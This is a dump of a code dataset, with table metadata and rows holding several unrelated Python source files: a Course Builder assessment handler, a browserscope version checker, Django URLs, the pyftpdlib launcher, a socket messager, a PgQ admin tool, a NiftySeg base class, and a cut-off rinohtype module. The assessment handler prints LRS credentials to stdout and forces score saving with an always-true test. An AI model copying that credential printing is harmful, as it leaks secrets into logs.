repo_name
stringlengths 6
61
| path
stringlengths 4
230
| copies
stringlengths 1
3
| size
stringlengths 4
6
| text
stringlengths 1.01k
850k
| license
stringclasses 15
values | hash
int64 -9,220,477,234,079,998,000
9,219,060,020B
| line_mean
float64 11.6
96.6
| line_max
int64 32
939
| alpha_frac
float64 0.26
0.9
| autogenerated
bool 1
class | ratio
float64 1.62
6.1
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
daafgo/CourseBuilder-Xapi | controllers/assessments.py | 1 | 11134 | # Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Classes and methods to manage all aspects of student assessments."""
__author__ = 'pgbovine@google.com (Philip Guo)'
import datetime
import logging
import httplib, urllib, logging, base64
from utils import BaseHandler
from utils import HUMAN_READABLE_DATETIME_FORMAT
import json, uuid, os
import urllib2
import base64
from controllers import lessons
from models import courses
from models import models
from models import review
from models import student_work
from models import transforms
from models import utils
from models.models import Student
from models.models import StudentAnswersEntity
from tools import verify
from google.appengine.ext import db
def store_score(course, student, assessment_type, score):
"""Stores a student's score on a particular assessment.
Args:
course: the course containing the assessment.
student: the student whose data is stored.
assessment_type: the type of the assessment.
score: the student's score on this assessment.
Returns:
the result of the assessment, if appropriate.
"""
# FIXME: Course creators can edit this code to implement custom
# assessment scoring and storage behavior
# TODO(pgbovine): Note that the latest version of answers are always saved,
# but scores are only saved if they're higher than the previous attempt.
# This can lead to unexpected analytics behavior. Resolve this.
existing_score = course.get_score(student, assessment_type)
# remember to cast to int for comparison
if (existing_score is None) or (score > int(existing_score)) or (1>0):
utils.set_score(student, assessment_type, score)
## Aqui deberiamos crear nuestro json
tincan_activity_uri = os.environ.get('HTTP_REFERER', 'urn:uuid:' + str(uuid.uuid4()))
Xapi_statement = {
"id": "12345678-1234-5678-1234-567812345678",
"actor":{
"mbox":"mailto:"+student.key().name()
},
"verb":{
"id":"http://adlnet.gov/expapi/verbs/created",
"display":{
"en-US":"created"
}
},
"object":{
"id" : tincan_activity_uri,
"definition": {
"name":{
"en-US": "Multiquiz"
},
"description": {
"en-US": "multipart activity description"
}
},
},
'result': {
'completion': True,
'score': {
'scaled': 0
}
}
}
statement=json.dumps(Xapi_statement)
print(statement)
print( '%(LRS_USERNAME)s:%(LRS_PASSWORD)s' % os.environ)
connection = httplib.HTTPConnection("127.0.0.1:9000")
connection.request('POST', "/xapi/statements", statement, {
'x-experience-api-version': '1.0',
'Authorization': 'Basic ' + base64.b64encode('%(LRS_USERNAME)s:%(LRS_PASSWORD)s' % os.environ),
'content-type': 'application/json',
})
response = connection.getresponse()
print ('%s %s' % (response.status, response.reason), response.read())
connection.close()
# response = http.request('POST', 'http:127.0.0.1:7000/statements', body=statement)
# webapp.request('http:127.0.0.1:7000/statements', 'POST', statement, {'content-type': 'application/json'})
#response_stream = urllib2.urlopen(req)
#requests.post('http:127.0.0.1:9000/xapi/statements', payload=json.dumps(statement))
class AnswerHandler(BaseHandler):
"""Handler for saving assessment answers."""
# Find student entity and save answers
@db.transactional(xg=True)
def update_assessment_transaction(
self, email, assessment_type, new_answers, score):
"""Stores answer and updates user scores.
Args:
email: the student's email address.
assessment_type: the title of the assessment.
new_answers: the latest set of answers supplied by the student.
score: the numerical assessment score.
Returns:
the student instance.
"""
student = Student.get_enrolled_student_by_email(email)
course = self.get_course()
# It may be that old Student entities don't have user_id set; fix it.
if not student.user_id:
student.user_id = self.get_user().user_id()
answers = StudentAnswersEntity.get_by_key_name(student.user_id)
if not answers:
answers = StudentAnswersEntity(key_name=student.user_id)
answers.updated_on = datetime.datetime.now()
utils.set_answer(answers, assessment_type, new_answers)
store_score(course, student, assessment_type, score)
student.put()
answers.put()
# Also record the event, which is useful for tracking multiple
# submissions and history.
models.EventEntity.record(
'submit-assessment', self.get_user(), transforms.dumps({
'type': 'assessment-%s' % assessment_type,
'values': new_answers, 'location': 'AnswerHandler'}))
return student
def get(self):
"""Handles GET requests.
This method is here because if a student logs out when on the
reviewed_assessment_confirmation page, that student is redirected to
the GET method of the corresponding handler. It might be a good idea to
merge this class with lessons.AssessmentHandler, which currently only
has a GET handler.
"""
self.redirect('/course')
# pylint: disable=too-many-statements
def post(self):
"""Handles POST requests."""
student = self.personalize_page_and_get_enrolled()
if not student:
return
if not self.assert_xsrf_token_or_fail(self.request, 'assessment-post'):
return
course = self.get_course()
assessment_type = self.request.get('assessment_type')
if not assessment_type:
self.error(404)
logging.error('No assessment type supplied.')
return
unit = course.find_unit_by_id(assessment_type)
if unit is None or unit.type != verify.UNIT_TYPE_ASSESSMENT:
self.error(404)
logging.error('No assessment named %s exists.', assessment_type)
return
self.template_value['navbar'] = {'course': True}
self.template_value['assessment'] = assessment_type
self.template_value['assessment_name'] = unit.title
self.template_value['is_last_assessment'] = (
course.is_last_assessment(unit))
self.template_value['unit_id'] = unit.unit_id
# Convert answers from JSON to dict.
answers = self.request.get('answers')
answers = transforms.loads(answers) if answers else []
grader = unit.workflow.get_grader()
# Scores are not recorded for human-reviewed assignments.
score = 0
if grader == courses.AUTO_GRADER:
score = int(round(float(self.request.get('score'))))
# Record assessment transaction.
student = self.update_assessment_transaction(
student.key().name(), assessment_type, answers, score)
if grader == courses.HUMAN_GRADER:
rp = course.get_reviews_processor()
# Guard against duplicate submissions of a human-graded assessment.
previously_submitted = rp.does_submission_exist(
unit.unit_id, student.get_key())
if not previously_submitted:
# Check that the submission due date has not passed.
time_now = datetime.datetime.now()
submission_due_date = unit.workflow.get_submission_due_date()
if time_now > submission_due_date:
self.template_value['time_now'] = time_now.strftime(
HUMAN_READABLE_DATETIME_FORMAT)
self.template_value['submission_due_date'] = (
submission_due_date.strftime(
HUMAN_READABLE_DATETIME_FORMAT))
self.template_value['error_code'] = (
'assignment_deadline_exceeded')
self.render('error.html')
return
submission_key = student_work.Submission.write(
unit.unit_id, student.get_key(), answers)
rp.start_review_process_for(
unit.unit_id, submission_key, student.get_key())
# Record completion event in progress tracker.
course.get_progress_tracker().put_assessment_completed(
student, assessment_type)
self.template_value['previously_submitted'] = previously_submitted
matcher = unit.workflow.get_matcher()
self.template_value['matcher'] = matcher
if matcher == review.PEER_MATCHER:
self.template_value['review_dashboard_url'] = (
'reviewdashboard?unit=%s' % unit.unit_id
)
self.render('reviewed_assessment_confirmation.html')
return
else:
# Record completion event in progress tracker.
course.get_progress_tracker().put_assessment_completed(
student, assessment_type)
# Save the submission in the datastore, overwriting the earlier
# version if it exists.
submission_key = student_work.Submission.write(
unit.unit_id, student.get_key(), answers)
course.update_final_grades(student)
parent_unit = course.get_parent_unit(unit.unit_id)
if parent_unit:
unit_contents = lessons.UnitHandler.UnitLeftNavElements(
course, parent_unit)
next_url = unit_contents.get_url_by(
'assessment', unit.unit_id, 0) + '&confirmation'
self.redirect('/' + next_url)
else:
self.template_value['result'] = course.get_overall_result(
student)
self.template_value['score'] = score
self.template_value['overall_score'] = course.get_overall_score(
student)
self.render('test_confirmation.html')
| apache-2.0 | -1,744,682,290,816,362,200 | 38.342756 | 114 | 0.599335 | false | 4.364563 | false | false | false |
t-artistik/browserscope | third_party/check_for_updates.py | 9 | 2884 | #!/usr/bin/python2.5
# Copyright 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the 'License')
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author slamm@google.com (Stephen Lamm)
import logging
import os
import re
import subprocess
def GetSubversionExternals():
subversion_externals = []
svn_cmd = ['svn', 'propget', 'svn:externals', '.']
output = subprocess.Popen(svn_cmd, stdout=subprocess.PIPE).communicate()[0]
for external_entry in output.splitlines():
if external_entry:
local_path, svn_url = external_entry.split()
if local_path.startswith('third_party/'):
subversion_externals.append((local_path, svn_url))
return dict(subversion_externals)
def GetThirdPartyDirectoriesToCheck(ignore_dirs):
ignore_dirs = set(ignore_dirs)
ignore_dirs.add('third_party/.svn')
check_dirs = []
for third_party_dir in os.listdir('third_party'):
relative_dir = 'third_party/%s' % third_party_dir
if (relative_dir not in ignore_dirs and
os.path.isdir(relative_dir)):
check_dirs.append(relative_dir)
return check_dirs
def CheckVersion(third_party_dir):
readme_file = open(os.path.join(third_party_dir, 'README.browserscope'))
print '--------------------------------------------------'
print 'Checking directory: %s' % third_party_dir
for line in readme_file.readlines():
line.strip()
match = re.match(
r'(VERSION|CHECK_VERSION|CHECK_VERSION_MANUALLY|URL):\s*(.*)', line)
if match:
readme_key, value = match.groups()
if readme_key == 'URL':
print 'URL: %s' % value
elif readme_key == 'VERSION':
print 'Local version: %s' % value
elif readme_key == 'CHECK_VERSION':
print 'Remote version:',
print subprocess.Popen(
value, shell=True, stdout=subprocess.PIPE).communicate()[0].strip()
else:
print 'Check manually: %s' % value
print
if __name__ == '__main__':
if 'third_party' not in os.listdir('.'):
os.chdir('..')
if 'third_party' not in os.listdir('.'):
logging.error('Must run from the application root.')
subversion_externals = GetSubversionExternals()
for skipping_dirs in sorted(subversion_externals.keys()):
print "Skipping directory managed by svn:externals: %s" % skipping_dirs
check_dirs = GetThirdPartyDirectoriesToCheck(subversion_externals.keys())
for third_party_dir in check_dirs:
CheckVersion(third_party_dir)
| apache-2.0 | 2,495,092,349,654,564,400 | 35.05 | 79 | 0.675451 | false | 3.673885 | false | false | false |
mostafamosly/Uraeus | Small/Small/urls.py | 1 | 2153 | from django.conf.urls import patterns, include, url
from django.contrib import admin
from Small import views
from .views import *
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
#from core.views import shop
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from core.views import shop
from django.conf import settings
admin.autodiscover()
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
url(r'^accounting/',include('accounting.urls')),
url(r'^core/',include('core.urls')),
#url(r'^purchase/',include('purchase.urls')),
url(r'^product/',include('product.urls')),
url(r'^warehouse/',include('warehouse.urls')),
url(r'^procurement/',include('procurement.urls')),
# url(r'^fulfillment/',include('fulfillment.urls')),
url(r'^$', Home.as_view(), name="home"),
url(r'^index$', Home.as_view(), name="home"),
url(r'^pricing$', Pricing.as_view(), name="pricing"),
url(r'^services$', Services.as_view(), name="services"),
url(r'^about$', About.as_view(), name="about"),
url(r'^profile$', views.Profile, name='profile'),
url(r'^$', Home.as_view(), name="home"),
url(r'^index$', Home.as_view(), name="home"),
url(r'^pricing$', Pricing.as_view(), name="pricing"),
url(r'^services$', Services.as_view(), name="services"),
url(r'^about$', About.as_view(), name="about"),
url(r'^accounts/', include('registration.backends.default.urls')),
)
urlpatterns += patterns('django.contrib.auth.views',
url(r'^login/$', 'login',
{'template_name': 'registration/login.html'},
name = 'login'
),
url(r'^logout/$', 'logout',
{'template_name': 'registration/logout.html'},
name = 'logout'
),
)
urlpatterns += staticfiles_urlpatterns()
if settings.DEBUG:
urlpatterns += patterns('',
url(r'^media/(?P<path>.*)$',
'django.views.static.serve',
{'document_root': settings.MEDIA_ROOT, }),
)
| gpl-3.0 | 8,056,116,137,476,029,000 | 31.621212 | 73 | 0.587088 | false | 3.858423 | false | true | false |
aliyun/oss-ftp | python27/win32/Lib/site-packages/pyftpdlib/__main__.py | 4 | 3808 | # Copyright (C) 2007-2016 Giampaolo Rodola' <g.rodola@gmail.com>.
# Use of this source code is governed by MIT license that can be
# found in the LICENSE file.
"""
Start a stand alone anonymous FTP server from the command line as in:
$ python -m pyftpdlib
"""
import logging
import optparse
import os
import sys
from . import __ver__
from ._compat import getcwdu
from .authorizers import DummyAuthorizer
from .handlers import FTPHandler
from .log import config_logging
from .servers import FTPServer
class CustomizedOptionFormatter(optparse.IndentedHelpFormatter):
"""Formats options shown in help in a prettier way."""
def format_option(self, option):
result = []
opts = self.option_strings[option]
result.append(' %s\n' % opts)
if option.help:
help_text = ' %s\n\n' % self.expand_default(option)
result.append(help_text)
return ''.join(result)
def main():
"""Start a stand alone anonymous FTP server."""
usage = "python -m pyftpdlib [options]"
parser = optparse.OptionParser(usage=usage, description=main.__doc__,
formatter=CustomizedOptionFormatter())
parser.add_option('-i', '--interface', default=None, metavar="ADDRESS",
help="specify the interface to run on (default all "
"interfaces)")
parser.add_option('-p', '--port', type="int", default=2121, metavar="PORT",
help="specify port number to run on (default 2121)")
parser.add_option('-w', '--write', action="store_true", default=False,
help="grants write access for the anonymous user "
"(default read-only)")
parser.add_option('-d', '--directory', default=getcwdu(), metavar="FOLDER",
help="specify the directory to share (default current "
"directory)")
parser.add_option('-n', '--nat-address', default=None, metavar="ADDRESS",
help="the NAT address to use for passive connections")
parser.add_option('-r', '--range', default=None, metavar="FROM-TO",
help="the range of TCP ports to use for passive "
"connections (e.g. -r 8000-9000)")
parser.add_option('-v', '--version', action='store_true',
help="print pyftpdlib version and exit")
parser.add_option('-V', '--verbose', action='store_true',
help="activate a more verbose logging")
options, args = parser.parse_args()
if options.version:
sys.exit("pyftpdlib %s" % __ver__)
if options.verbose:
config_logging(level=logging.DEBUG)
passive_ports = None
if options.range:
try:
start, stop = options.range.split('-')
start = int(start)
stop = int(stop)
except ValueError:
parser.error('invalid argument passed to -r option')
else:
passive_ports = list(range(start, stop + 1))
# On recent Windows versions, if address is not specified and IPv6
# is installed the socket will listen on IPv6 by default; in this
# case we force IPv4 instead.
if os.name in ('nt', 'ce') and not options.interface:
options.interface = '0.0.0.0'
authorizer = DummyAuthorizer()
perm = options.write and "elradfmwM" or "elr"
authorizer.add_anonymous(options.directory, perm=perm)
handler = FTPHandler
handler.authorizer = authorizer
handler.masquerade_address = options.nat_address
handler.passive_ports = passive_ports
ftpd = FTPServer((options.interface, options.port), FTPHandler)
try:
ftpd.serve_forever()
finally:
ftpd.close_all()
if __name__ == '__main__':
main()
| mit | -1,431,102,941,654,268,400 | 37.857143 | 79 | 0.609244 | false | 4.081458 | false | false | false |
lehtolav/distributed-face-recognition | pi side/messager.py | 1 | 2766 | # Trades messages with a remote host/client
# Essentially provides a layer to transform generic socket datastreams
# into messages (strings) with messagetypes
# Messagetype will be used to invoke a registered callback for that type
# with the message content as its argument
import socket
import select
import struct
mode = "I"
length_size = struct.calcsize(mode)
def recv_message(sock):
data = sock.recv(length_size, socket.MSG_WAITALL)
if not data:
return None, None
msg_size = struct.unpack(mode, data)[0]
messagetype = ''
if msg_size > 0:
messagetype = sock.recv(msg_size, socket.MSG_WAITALL)
data = sock.recv(length_size, socket.MSG_WAITALL)
msg_size = struct.unpack(mode, data)[0]
message = ''
if msg_size > 0:
message = sock.recv(msg_size, socket.MSG_WAITALL)
print messagetype
return messagetype, message
def send_message(sock, messagetype, message):
try:
mtl = struct.pack(mode, len(messagetype))
mcl = struct.pack(mode, len(message))
sock.sendall(mtl + messagetype + mcl + message)
except socket.error, e:
print 'Error sending data'
print e
class Messager():
def __init__(self):
self.clients = []
self.callbacks = dict()
self.listening = False
def __del__(self):
if self.listening:
self.hostSock.close()
for sock in clients:
sock.close()
def setupHost(self, address, port):
self.hostSock = socket.socket()
self.hostSock.bind((address, port))
self.hostSock.listen(5)
self.hostSock.setblocking(0)
self.listening = True
def processHost(self):
try:
if self.listening:
conn, address = self.hostSock.accept()
self.clients.append(conn)
except socket.timeout:
pass
except socket.error, e:
if e[0] == 11:
pass
else:
print e
inputs, outputs, errors = select.select(self.clients, [], self.clients, 0)
for sock in inputs:
messagetype, message = recv_message(sock)
if messagetype is None:
self.clients.remove(sock)
sock.close()
elif messagetype in self.callbacks:
self.callbacks[messagetype](sock, message)
for sock in errors:
self.clients.remove(sock)
sock.close()
# def send(self, target, messagetype, message):
# pass
def register(self, messagetype, callback):
self.callbacks[messagetype] = callback
def unregister(self, messagetype):
del self.callbacks[messagetype]
def connect(self, remoteHost, remotePort):
# Connect to a remote host and add its socket to the client list
# i.e. we don't listen for connection, but initiate it
#This allows two-way communication between two messager objects
sock = socket.socket()
sock.connect((remoteHost, remotePort))
self.clients.append(sock)
return sock
| mit | 7,856,820,791,128,280,000 | 27.22449 | 76 | 0.686551 | false | 3.150342 | false | false | false |
ssinger/skytools-cvs | python/pgqadm.py | 1 | 5673 | #! /usr/bin/env python
"""PgQ ticker and maintenance.
"""
import sys
import skytools
from pgq.ticker import SmartTicker
from pgq.status import PGQStatus
#from pgq.admin import PGQAdmin
"""TODO:
pgqadm ini check
"""
command_usage = """
%prog [options] INI CMD [subcmd args]
commands:
ticker start ticking & maintenance process
status show overview of queue health
install install code into db
create QNAME create queue
drop QNAME drop queue
register QNAME CONS install code into db
unregister QNAME CONS install code into db
config QNAME [VAR=VAL] show or change queue config
"""
config_allowed_list = {
'queue_ticker_max_count': 'int',
'queue_ticker_max_lag': 'interval',
'queue_ticker_idle_period': 'interval',
'queue_rotation_period': 'interval',
}
class PGQAdmin(skytools.DBScript):
def __init__(self, args):
skytools.DBScript.__init__(self, 'pgqadm', args)
self.set_single_loop(1)
if len(self.args) < 2:
print "need command"
sys.exit(1)
int_cmds = {
'create': self.create_queue,
'drop': self.drop_queue,
'register': self.register,
'unregister': self.unregister,
'install': self.installer,
'config': self.change_config,
}
cmd = self.args[1]
if cmd == "ticker":
script = SmartTicker(args)
elif cmd == "status":
script = PGQStatus(args)
elif cmd in int_cmds:
script = None
self.work = int_cmds[cmd]
else:
print "unknown command"
sys.exit(1)
if self.pidfile:
self.pidfile += ".admin"
self.run_script = script
def start(self):
if self.run_script:
self.run_script.start()
else:
skytools.DBScript.start(self)
def init_optparse(self, parser=None):
p = skytools.DBScript.init_optparse(self, parser)
p.set_usage(command_usage.strip())
return p
def installer(self):
objs = [
skytools.DBLanguage("plpgsql"),
skytools.DBFunction("txid_current_snapshot", 0, sql_file="txid.sql"),
skytools.DBSchema("pgq", sql_file="pgq.sql"),
]
db = self.get_database('db')
curs = db.cursor()
skytools.db_install(curs, objs, self.log)
db.commit()
def create_queue(self):
qname = self.args[2]
self.log.info('Creating queue: %s' % qname)
self.exec_sql("select pgq.create_queue(%s)", [qname])
def drop_queue(self):
qname = self.args[2]
self.log.info('Dropping queue: %s' % qname)
self.exec_sql("select pgq.drop_queue(%s)", [qname])
def register(self):
qname = self.args[2]
cons = self.args[3]
self.log.info('Registering consumer %s on queue %s' % (cons, qname))
self.exec_sql("select pgq.register_consumer(%s, %s)", [qname, cons])
def unregister(self):
qname = self.args[2]
cons = self.args[3]
self.log.info('Unregistering consumer %s from queue %s' % (cons, qname))
self.exec_sql("select pgq.unregister_consumer(%s, %s)", [qname, cons])
def change_config(self):
if len(self.args) < 3:
list = self.get_queue_list()
for qname in list:
self.show_config(qname)
return
qname = self.args[2]
if len(self.args) == 3:
self.show_config(qname)
return
alist = []
for el in self.args[3:]:
k, v = el.split('=')
if k not in config_allowed_list:
qk = "queue_" + k
if qk not in config_allowed_list:
raise Exception('unknown config var: '+k)
k = qk
expr = "%s=%s" % (k, skytools.quote_literal(v))
alist.append(expr)
self.log.info('Change queue %s config to: %s' % (qname, ", ".join(alist)))
sql = "update pgq.queue set %s where queue_name = %s" % (
", ".join(alist), skytools.quote_literal(qname))
self.exec_sql(sql, [])
def exec_sql(self, q, args):
self.log.debug(q)
db = self.get_database('db')
curs = db.cursor()
curs.execute(q, args)
db.commit()
def show_config(self, qname):
fields = []
for f, kind in config_allowed_list.items():
if kind == 'interval':
sql = "extract('epoch' from %s)::text as %s" % (f, f)
fields.append(sql)
else:
fields.append(f)
klist = ", ".join(fields)
q = "select " + klist + " from pgq.queue where queue_name = %s"
db = self.get_database('db')
curs = db.cursor()
curs.execute(q, [qname])
res = curs.dictfetchone()
db.commit()
if res is None:
print "no such queue:", qname
return
print qname
for k in config_allowed_list:
n = k
if k[:6] == "queue_":
n = k[6:]
print " %s\t=%7s" % (n, res[k])
def get_queue_list(self):
db = self.get_database('db')
curs = db.cursor()
curs.execute("select queue_name from pgq.queue order by 1")
rows = curs.fetchall()
db.commit()
list = []
for r in rows:
list.append(r[0])
return list
if __name__ == '__main__':
script = PGQAdmin(sys.argv[1:])
script.start()
| isc | -5,971,504,502,442,351,000 | 27.651515 | 82 | 0.52459 | false | 3.631882 | true | false | false |
mick-d/nipype | nipype/interfaces/niftyseg/base.py | 2 | 1612 | # -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
The niftyseg module provides classes for interfacing with `niftyseg
<https://sourceforge.net/projects/niftyseg/>`_ command line tools.
These are the base tools for working with niftyseg.
EM Statistical Segmentation tool is found in niftyseg/em.py
Fill lesions tool is found in niftyseg/lesions.py
Mathematical operation tool is found in niftyseg/maths.py
Patch Match tool is found in niftyseg/patchmatch.py
Statistical operation tool is found in niftyseg/stats.py
Label Fusion and CalcTopNcc tools are in niftyseg/steps.py
Examples
--------
See the docstrings of the individual classes for examples.
"""
from __future__ import print_function, division, unicode_literals, absolute_import
from ..niftyreg.base import no_nifty_package
from ..niftyfit.base import NiftyFitCommand
import subprocess
import warnings
warn = warnings.warn
warnings.filterwarnings('always', category=UserWarning)
class NiftySegCommand(NiftyFitCommand):
"""
Base support interface for NiftySeg commands.
"""
_suffix = '_ns'
_min_version = None
def __init__(self, **inputs):
super(NiftySegCommand, self).__init__(**inputs)
def get_version(self):
if no_nifty_package(cmd=self.cmd):
return None
# exec_cmd = ''.join((self.cmd, ' --version'))
exec_cmd = 'seg_EM --version'
# Using seg_EM for version (E.G: seg_stats --version doesn't work)
return subprocess.check_output(exec_cmd, shell=True).strip('\n')
| bsd-3-clause | 1,078,164,674,367,968,600 | 33.297872 | 82 | 0.708437 | false | 3.393684 | false | false | false |
brechtm/rinohtype | src/rinoh/attribute.py | 1 | 20698 | # This file is part of rinohtype, the Python document preparation system.
#
# Copyright (c) Brecht Machiels.
#
# Use of this source code is subject to the terms of the GNU Affero General
# Public License v3. See the LICENSE file or http://www.gnu.org/licenses/.
import re
from collections import OrderedDict
from configparser import ConfigParser
from io import StringIO
from itertools import chain
from pathlib import Path
from token import NUMBER, ENDMARKER, MINUS, PLUS, NAME, NEWLINE
from tokenize import generate_tokens
from warnings import warn
from .util import (NamedDescriptor, WithNamedDescriptors,
NotImplementedAttribute, class_property, PeekIterator,
cached)
__all__ = ['AttributeType', 'AcceptNoneAttributeType', 'OptionSet',
'OptionSetMeta', 'Attribute', 'OverrideDefault',
'AttributesDictionary', 'Configurable', 'RuleSet', 'RuleSetFile',
'Bool', 'Integer', 'ParseError', 'Var']
class AttributeType(object):
def __eq__(self, other):
return type(self) == type(other) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
@classmethod
def check_type(cls, value):
return isinstance(value, cls)
@classmethod
def from_string(cls, string, source=None):
return cls.parse_string(string, source)
@classmethod
def parse_string(cls, string, source):
tokens = TokenIterator(string)
value = cls.from_tokens(tokens, source)
if next(tokens).type != ENDMARKER:
raise ParseError('Syntax error')
return value
@classmethod
def from_tokens(cls, tokens, source):
raise NotImplementedError(cls)
@classmethod
def validate(cls, value):
if isinstance(value, str):
value = cls.from_string(value)
if not cls.check_type(value):
raise TypeError("{} is not of type {}".format(value, cls.__name__))
return value
@classmethod
def doc_repr(cls, value):
return '``{}``'.format(value) if value else '(no value)'
@classmethod
def doc_format(cls):
warn('Missing implementation for {}.doc_format'.format(cls.__name__))
return ''
class AcceptNoneAttributeType(AttributeType):
"""Accepts 'none' (besides other values)"""
@classmethod
def check_type(cls, value):
return (isinstance(value, type(None))
or super(__class__, cls).check_type(value))
@classmethod
def from_string(cls, string, source=None):
if string.strip().lower() == 'none':
return None
return super(__class__, cls).from_string(string, source)
@classmethod
def doc_repr(cls, value):
return '``{}``'.format('none' if value is None else value)
class OptionSetMeta(type):
def __new__(metacls, classname, bases, cls_dict):
cls = super().__new__(metacls, classname, bases, cls_dict)
cls.__doc__ = (cls_dict['__doc__'] + '\n\n'
if '__doc__' in cls_dict else '')
cls.__doc__ += 'Accepts: {}'.format(cls.doc_format())
return cls
def __getattr__(cls, item):
if item == 'NONE' and None in cls.values:
return None
string = item.lower().replace('_', ' ')
if item.isupper() and string in cls.values:
return string
raise AttributeError(item)
def __iter__(cls):
return iter(cls.values)
class OptionSet(AttributeType, metaclass=OptionSetMeta):
"""Accepts the values listed in :attr:`values`"""
values = ()
@classmethod
def check_type(cls, value):
return value in cls.values
@class_property
def value_strings(cls):
return ['none' if value is None else value.lower()
for value in cls.values]
@classmethod
def _value_from_tokens(cls, tokens):
if tokens.next.type != NAME:
raise ParseError('Expecting a name')
token = next(tokens)
_, start_col = token.start
while tokens.next and tokens.next.exact_type in (NAME, MINUS):
token = next(tokens)
_, end_col = token.end
return token.line[start_col:end_col].strip()
@classmethod
def from_tokens(cls, tokens, source):
option_string = cls._value_from_tokens(tokens)
try:
index = cls.value_strings.index(option_string.lower())
except ValueError:
raise ValueError("'{}' is not a valid {}. Must be one of: '{}'"
.format(option_string, cls.__name__,
"', '".join(cls.value_strings)))
return cls.values[index]
@classmethod
def doc_repr(cls, value):
return '``{}``'.format(value)
@classmethod
def doc_format(cls):
return ', '.join('``{}``'.format(s) for s in cls.value_strings)
class Attribute(NamedDescriptor):
"""Descriptor used to describe a style attribute"""
def __init__(self, accepted_type, default_value, description):
self.name = None
self.accepted_type = accepted_type
self.default_value = accepted_type.validate(default_value)
self.description = description
self.source = None
def __get__(self, style, type=None):
try:
return style.get(self.name, self.default_value)
except AttributeError:
return self
def __set__(self, style, value):
if not self.accepted_type.check_type(value):
raise TypeError('The {} attribute only accepts {} instances'
.format(self.name, self.accepted_type.__name__))
style[self.name] = value
class OverrideDefault(Attribute):
"""Overrides the default value of an attribute defined in a superclass"""
def __init__(self, default_value):
self._default_value = default_value
@property
def overrides(self):
return self._overrides
@overrides.setter
def overrides(self, attribute):
self._overrides = attribute
self.default_value = self.accepted_type.validate(self._default_value)
@property
def accepted_type(self):
return self.overrides.accepted_type
@property
def description(self):
return self.overrides.description
class WithAttributes(WithNamedDescriptors):
def __new__(mcls, classname, bases, cls_dict):
attributes = cls_dict['_attributes'] = OrderedDict()
doc = []
for name, attr in cls_dict.items():
if not isinstance(attr, Attribute):
continue
attributes[name] = attr
if isinstance(attr, OverrideDefault):
for mro_cls in (cls for base_cls in bases
for cls in base_cls.__mro__):
try:
attr.overrides = mro_cls._attributes[name]
break
except (AttributeError, KeyError):
pass
else:
raise NotImplementedError
battr = ':attr:`{0} <.{0}.{1}>`'.format(mro_cls.__name__, name)
inherits = f' (inherited from {battr})'
overrides = f' (overrides {battr} default)'
else:
inherits = overrides = ''
doc.append('{}: {}{}'.format(name, attr.description, inherits))
format = attr.accepted_type.doc_format()
default = attr.accepted_type.doc_repr(attr.default_value)
doc.append('\n *Accepts* :class:`.{}`: {}\n'
.format(attr.accepted_type.__name__, format))
doc.append('\n *Default*: {}{}\n'
.format(default, overrides))
supported_attributes = list(name for name in attributes)
documented = set(supported_attributes)
for base_class in bases:
try:
supported_attributes.extend(base_class._supported_attributes)
except AttributeError:
continue
for mro_cls in base_class.__mro__:
for name, attr in getattr(mro_cls, '_attributes', {}).items():
if name in documented:
continue
doc.append('{0}: {1} (inherited from :attr:`{2} <.{2}.{0}>`)'
.format(name, attr.description,
mro_cls.__name__))
format = attr.accepted_type.doc_format()
default = attr.accepted_type.doc_repr(attr.default_value)
doc.append('\n *Accepts* :class:`.{}`: {}\n'
.format(attr.accepted_type.__name__, format))
doc.append('\n *Default*: {}\n'.format(default))
documented.add(name)
if doc:
attr_doc = '\n '.join(chain([' Attributes:'], doc))
cls_dict['__doc__'] = (cls_dict.get('__doc__', '') + '\n\n'
+ attr_doc)
cls_dict['_supported_attributes'] = supported_attributes
return super().__new__(mcls, classname, bases, cls_dict)
@property
def _all_attributes(cls):
for mro_class in reversed(cls.__mro__):
for name in getattr(mro_class, '_attributes', ()):
yield name
@property
def supported_attributes(cls):
for mro_class in cls.__mro__:
for name in getattr(mro_class, '_supported_attributes', ()):
yield name
class AttributesDictionary(OrderedDict, metaclass=WithAttributes):
def __init__(self, base=None, **attributes):
self.name = None
self.source = None
self.base = base
super().__init__(attributes)
@classmethod
def _get_default(cls, attribute):
"""Return the default value for `attribute`.
If no default is specified in this style, get the default from the
nearest superclass.
If `attribute` is not supported, raise a :class:`KeyError`."""
try:
for klass in cls.__mro__:
if attribute in klass._attributes:
return klass._attributes[attribute].default_value
except AttributeError:
raise KeyError("No attribute '{}' in {}".format(attribute, cls))
@classmethod
def attribute_definition(cls, name):
try:
for klass in cls.__mro__:
if name in klass._attributes:
return klass._attributes[name]
except AttributeError:
pass
raise KeyError(name)
@classmethod
def attribute_type(cls, name):
try:
return cls.attribute_definition(name).accepted_type
except KeyError:
raise TypeError('{} is not a supported attribute for {}'
.format(name, cls.__name__))
@classmethod
def get_ruleset(self):
raise NotImplementedError
class DefaultValueException(Exception):
pass
class Configurable(object):
configuration_class = NotImplementedAttribute()
def configuration_name(self, document):
raise NotImplementedError
def get_config_value(self, attribute, document):
ruleset = self.configuration_class.get_ruleset(document)
return ruleset.get_value_for(self, attribute, document)
class BaseConfigurationException(Exception):
def __init__(self, base_name):
self.name = base_name
class Source(object):
"""Describes where a :class:`DocumentElement` was defined"""
@property
